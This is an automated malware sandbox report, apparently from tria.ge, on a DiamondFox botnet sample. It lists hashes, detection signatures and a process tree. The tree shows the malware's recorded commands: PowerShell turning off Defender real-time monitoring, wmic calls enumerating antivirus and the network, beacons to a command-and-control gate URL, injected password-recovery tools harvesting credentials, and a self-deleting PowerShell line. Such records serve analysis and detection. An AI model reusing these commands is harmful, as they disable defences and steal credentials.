Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
133s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
04/07/2021, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe
Resource
win10v20210408
General
-
Target
SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe
-
Size
203KB
-
MD5
a1e165e1926c0c83123c89fce6b1af56
-
SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f
-
SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
-
SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 13 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral1/files/0x00040000000130d1-60.dat diamondfox behavioral1/files/0x00040000000130d1-61.dat diamondfox behavioral1/files/0x00040000000130d1-63.dat diamondfox behavioral1/files/0x00040000000130d1-75.dat diamondfox behavioral1/files/0x00040000000130d1-74.dat diamondfox behavioral1/files/0x00040000000130d1-137.dat diamondfox behavioral1/files/0x00040000000130d1-142.dat diamondfox behavioral1/files/0x00040000000130d1-148.dat diamondfox behavioral1/files/0x00040000000130d1-154.dat diamondfox behavioral1/files/0x00040000000130d1-159.dat diamondfox behavioral1/files/0x00040000000130d1-162.dat diamondfox behavioral1/files/0x00040000000130d1-171.dat diamondfox behavioral1/files/0x00040000000130d1-176.dat diamondfox -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/692-152-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView behavioral1/memory/692-153-0x000000000044412E-mapping.dmp MailPassView behavioral1/memory/692-156-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/1028-135-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView behavioral1/memory/1028-136-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral1/memory/1028-139-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 9 IoCs
resource yara_rule behavioral1/memory/1028-135-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/1028-136-0x00000000004466F4-mapping.dmp Nirsoft behavioral1/memory/1028-139-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/1040-146-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/1040-147-0x0000000000413E10-mapping.dmp Nirsoft behavioral1/memory/1040-151-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/692-152-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral1/memory/692-153-0x000000000044412E-mapping.dmp Nirsoft behavioral1/memory/692-156-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 1500 MicrosoftEdgeCPS.exe 1028 MicrosoftEdgeCPS.exe 588 MicrosoftEdgeCPS.exe 1040 MicrosoftEdgeCPS.exe 692 MicrosoftEdgeCPS.exe 1268 MicrosoftEdgeCPS.exe 396 MicrosoftEdgeCPS.exe 1372 MicrosoftEdgeCPS.exe 1256 MicrosoftEdgeCPS.exe 2244 localmgr.exe -
Deletes itself 1 IoCs
pid Process 1532 powershell.exe -
Loads dropped DLL 4 IoCs
pid Process 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 1500 MicrosoftEdgeCPS.exe 1500 MicrosoftEdgeCPS.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 1500 set thread context of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 set thread context of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 set thread context of 1040 1500 MicrosoftEdgeCPS.exe 52 PID 1500 set thread context of 692 1500 MicrosoftEdgeCPS.exe 53 PID 1500 set thread context of 1268 1500 MicrosoftEdgeCPS.exe 54 PID 1500 set thread context of 396 1500 MicrosoftEdgeCPS.exe 57 PID 1500 set thread context of 1372 1500 MicrosoftEdgeCPS.exe 58 PID 1500 set thread context of 1256 1500 MicrosoftEdgeCPS.exe 59 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
pid Process 1968 taskkill.exe 1676 taskkill.exe 1684 taskkill.exe 912 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1792 notepad.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1532 powershell.exe 1720 powershell.exe 1532 powershell.exe 1720 powershell.exe 1500 MicrosoftEdgeCPS.exe 1028 MicrosoftEdgeCPS.exe 1028 MicrosoftEdgeCPS.exe 1500 MicrosoftEdgeCPS.exe 1500 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1676 wmic.exe Token: SeSecurityPrivilege 1676 wmic.exe Token: SeTakeOwnershipPrivilege 1676 wmic.exe Token: SeLoadDriverPrivilege 1676 wmic.exe Token: SeSystemProfilePrivilege 1676 wmic.exe Token: SeSystemtimePrivilege 1676 wmic.exe Token: SeProfSingleProcessPrivilege 1676 wmic.exe Token: SeIncBasePriorityPrivilege 1676 wmic.exe Token: SeCreatePagefilePrivilege 1676 wmic.exe Token: SeBackupPrivilege 1676 wmic.exe Token: SeRestorePrivilege 1676 wmic.exe Token: SeShutdownPrivilege 1676 wmic.exe Token: SeDebugPrivilege 1676 wmic.exe Token: SeSystemEnvironmentPrivilege 1676 wmic.exe Token: SeRemoteShutdownPrivilege 1676 wmic.exe Token: SeUndockPrivilege 1676 wmic.exe Token: SeManageVolumePrivilege 1676 wmic.exe Token: 33 1676 wmic.exe Token: 34 1676 wmic.exe Token: 35 1676 wmic.exe Token: SeDebugPrivilege 1532 powershell.exe Token: SeDebugPrivilege 1720 powershell.exe Token: SeIncreaseQuotaPrivilege 1676 wmic.exe Token: SeSecurityPrivilege 1676 wmic.exe Token: SeTakeOwnershipPrivilege 1676 wmic.exe Token: SeLoadDriverPrivilege 1676 wmic.exe Token: SeSystemProfilePrivilege 1676 wmic.exe Token: SeSystemtimePrivilege 1676 wmic.exe Token: SeProfSingleProcessPrivilege 1676 wmic.exe Token: SeIncBasePriorityPrivilege 1676 wmic.exe Token: SeCreatePagefilePrivilege 1676 wmic.exe Token: SeBackupPrivilege 1676 wmic.exe Token: SeRestorePrivilege 1676 wmic.exe Token: SeShutdownPrivilege 1676 wmic.exe Token: SeDebugPrivilege 1676 wmic.exe Token: SeSystemEnvironmentPrivilege 1676 wmic.exe Token: SeRemoteShutdownPrivilege 1676 wmic.exe Token: SeUndockPrivilege 1676 wmic.exe Token: SeManageVolumePrivilege 1676 wmic.exe Token: 33 1676 wmic.exe Token: 34 1676 wmic.exe Token: 35 1676 wmic.exe Token: SeIncreaseQuotaPrivilege 1252 wmic.exe Token: SeSecurityPrivilege 1252 wmic.exe Token: SeTakeOwnershipPrivilege 1252 wmic.exe Token: SeLoadDriverPrivilege 1252 wmic.exe Token: SeSystemProfilePrivilege 1252 wmic.exe Token: SeSystemtimePrivilege 1252 wmic.exe Token: SeProfSingleProcessPrivilege 1252 wmic.exe Token: SeIncBasePriorityPrivilege 1252 wmic.exe Token: SeCreatePagefilePrivilege 1252 wmic.exe Token: SeBackupPrivilege 1252 wmic.exe Token: SeRestorePrivilege 1252 wmic.exe Token: SeShutdownPrivilege 1252 wmic.exe Token: SeDebugPrivilege 1252 wmic.exe Token: SeSystemEnvironmentPrivilege 1252 wmic.exe Token: SeRemoteShutdownPrivilege 1252 wmic.exe Token: SeUndockPrivilege 1252 wmic.exe Token: SeManageVolumePrivilege 1252 wmic.exe Token: 33 1252 wmic.exe Token: 34 1252 wmic.exe Token: 35 1252 wmic.exe Token: SeIncreaseQuotaPrivilege 1252 wmic.exe Token: SeSecurityPrivilege 1252 wmic.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 588 MicrosoftEdgeCPS.exe 396 MicrosoftEdgeCPS.exe 1372 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1268 wrote to memory of 1500 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 29 PID 1268 wrote to memory of 1500 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 29 PID 1268 wrote to memory of 1500 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 29 PID 1268 wrote to memory of 1500 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 29 PID 1268 wrote to memory of 1532 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 31 PID 1268 wrote to memory of 1532 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 31 PID 1268 wrote to memory of 1532 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 31 PID 1268 wrote to memory of 1532 1268 SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe 31 PID 1500 wrote to memory of 1720 1500 MicrosoftEdgeCPS.exe 32 PID 1500 wrote to memory of 1720 1500 MicrosoftEdgeCPS.exe 32 PID 1500 wrote to memory of 1720 1500 MicrosoftEdgeCPS.exe 32 PID 1500 wrote to memory of 1720 1500 MicrosoftEdgeCPS.exe 32 PID 1500 wrote to memory of 1676 1500 MicrosoftEdgeCPS.exe 35 PID 1500 wrote to memory of 1676 1500 MicrosoftEdgeCPS.exe 35 PID 1500 wrote to memory of 1676 1500 MicrosoftEdgeCPS.exe 35 PID 1500 wrote to memory of 1676 1500 MicrosoftEdgeCPS.exe 35 PID 1500 wrote to memory of 1252 1500 MicrosoftEdgeCPS.exe 37 PID 1500 wrote to memory of 1252 1500 MicrosoftEdgeCPS.exe 37 PID 1500 wrote to memory of 1252 1500 MicrosoftEdgeCPS.exe 37 PID 1500 wrote to memory of 1252 1500 MicrosoftEdgeCPS.exe 37 PID 1500 wrote to memory of 1284 1500 MicrosoftEdgeCPS.exe 40 PID 1500 wrote to memory of 1284 1500 MicrosoftEdgeCPS.exe 40 PID 1500 wrote to memory of 1284 1500 MicrosoftEdgeCPS.exe 40 PID 1500 wrote to memory of 1284 1500 MicrosoftEdgeCPS.exe 40 PID 1500 wrote to memory of 620 1500 MicrosoftEdgeCPS.exe 42 PID 1500 wrote to memory of 620 1500 MicrosoftEdgeCPS.exe 42 PID 1500 wrote to memory of 620 1500 MicrosoftEdgeCPS.exe 42 PID 1500 wrote to memory of 620 1500 MicrosoftEdgeCPS.exe 42 PID 1500 wrote to memory of 1372 1500 MicrosoftEdgeCPS.exe 44 PID 1500 wrote to memory of 1372 1500 MicrosoftEdgeCPS.exe 44 PID 1500 wrote to memory of 1372 1500 MicrosoftEdgeCPS.exe 44 PID 1500 wrote to memory of 1372 1500 MicrosoftEdgeCPS.exe 44 PID 1500 wrote to memory of 1004 1500 MicrosoftEdgeCPS.exe 46 PID 1500 wrote to memory of 1004 1500 MicrosoftEdgeCPS.exe 46 PID 1500 wrote to memory of 1004 1500 MicrosoftEdgeCPS.exe 46 PID 1500 wrote to memory of 1004 1500 MicrosoftEdgeCPS.exe 46 PID 1500 wrote to memory of 1284 1500 MicrosoftEdgeCPS.exe 48 PID 1500 wrote to memory of 1284 1500 MicrosoftEdgeCPS.exe 48 PID 1500 wrote to memory of 1284 1500 MicrosoftEdgeCPS.exe 48 PID 1500 wrote to memory of 1284 1500 MicrosoftEdgeCPS.exe 48 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 1028 1500 MicrosoftEdgeCPS.exe 50 PID 1500 wrote to memory of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 wrote to memory of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 wrote to memory of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 wrote to memory of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 wrote to memory of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 wrote to memory of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 wrote to memory of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 wrote to memory of 588 1500 MicrosoftEdgeCPS.exe 51 PID 1500 wrote to memory of 1040 1500 MicrosoftEdgeCPS.exe 52 PID 1500 wrote to memory of 1040 1500 MicrosoftEdgeCPS.exe 52 PID 1500 wrote to memory of 1040 1500 MicrosoftEdgeCPS.exe 52 PID 1500 wrote to memory of 1040 1500 MicrosoftEdgeCPS.exe 52 PID 1500 wrote to memory of 1040 1500 MicrosoftEdgeCPS.exe 52 PID 1500 wrote to memory of 1040 1500 MicrosoftEdgeCPS.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵PID:1284
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵PID:620
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵PID:1372
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:1004
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:1284
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1028
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:588
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"3⤵
- Executes dropped EXE
PID:1040
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"3⤵
- Executes dropped EXE
PID:692
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
PID:1268 -
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Opens file in notepad (likely ransom note)
PID:1792
-
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵PID:608
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:396
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1372
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
PID:1256
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:1556
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:1428
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1268 /F3⤵
- Kills process with taskkill
PID:1968
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 396 /F3⤵
- Kills process with taskkill
PID:1676
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1372 /F3⤵
- Kills process with taskkill
PID:1684
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1256 /F3⤵
- Kills process with taskkill
PID:912
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:2116
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exe"C:\Users\Admin\AppData\Local\Temp\localmgr.exe"3⤵
- Executes dropped EXE
PID:2244
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Fugrafa.133115.17408.5029.exe' -Force -Recurse2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532
-